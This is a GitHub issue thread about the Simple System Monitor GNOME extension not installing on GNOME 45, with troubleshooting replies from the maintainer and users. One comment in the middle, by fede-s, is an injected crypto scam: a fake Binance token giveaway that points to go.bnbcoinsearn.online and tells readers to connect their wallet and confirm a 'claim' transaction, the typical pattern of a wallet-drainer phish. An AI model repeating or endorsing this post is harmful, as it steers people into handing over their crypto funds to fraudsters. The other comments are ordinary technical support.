### ISSUE TITLE
Can't install on gnome 45

### ISSUE THREAD

**Issue by lorebored** [LGiki/gnome-shell-extension-simple-system-monitor#20]
![image](https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/assets/108958186/00c37694-3cf0-4870-8b8a-a0c92b40b3f2)

Sorry for the termina in Italian

**Comment by LGiki** [comment]
Sorry for the late reply. It seems that the packed zip file cannot be found. Could you please execute `ls` under `~/gnome-shell-extension-simple-system-monitor` to check if there is a zip file present?

**Comment by lorebored** [comment]
So I have to run `cd gnome-shell-simple-system-monitor` and than `ls` there
I'm not very experienced 
Sorry for my bad English

**Comment by lorebored** [comment]
@LGiki There isn't any zip file

**Comment by LGiki** [comment]
Mi dispiace, sono stato molto occupato con il lavoro ultimamente. Immagino che ci siano stati alcuni imprevisti durante la costruzione, ma puoi scaricare l'estensione già compilata direttamente da [https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/releases/tag/v15](https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/releases/tag/v15). A proposito, questo messaggio è stato tradotto usando ChatGPT.

**Comment by rlad78** [comment]
So I also cannot install this extension in Gnome 45. I've been using it since Gnome 43 (and have been loving it!) but even on [the Gnome Extensions page](https://extensions.gnome.org/extension/4506/simple-system-monitor/) it doesn't seem to be available for Gnome 45.

![image](https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/assets/5733291/85a8e9b0-eb8a-4fd4-b12e-151a796963c2)

Is it supposed to be supported for Gnome 45?

**Comment by lorebored** [comment]
@rlad78 I think this fantastic extension has now been abandoned by @LGiki

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by Nieto2018** [comment]
Hi guys,

I have found a solution for gnome 45, at least, it works for me.

1. Install the extension manually following the instructions in the "Build" section of the readme.
2. If the extension is not recognised, execute the following command `gnome-shell --replace &`. The command was found [here](https://askubuntu.com/questions/1388337/gnome-shell-extensions-not-working-in-ubuntu-21-04-different-error-check-everywh). When I ran the command on my PC, I received an error and had to log out and log back in.
3. The extension should work correctly.

If this doesn't work, try to remove the old file of the extension and try again the steps above.
`rm -rf $HOME/.local/share/gnome-shell/extensions/ssm-gnome@lgiki.net`.

![imagen](https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/assets/36169946/4ac8c897-aab9-4725-925a-75b439a1ab05)
![imagen](https://github.com/LGiki/gnome-shell-extension-simple-system-monitor/assets/36169946/8fbd71da-ac18-4eb9-9dfe-f6cdfab2f2df)
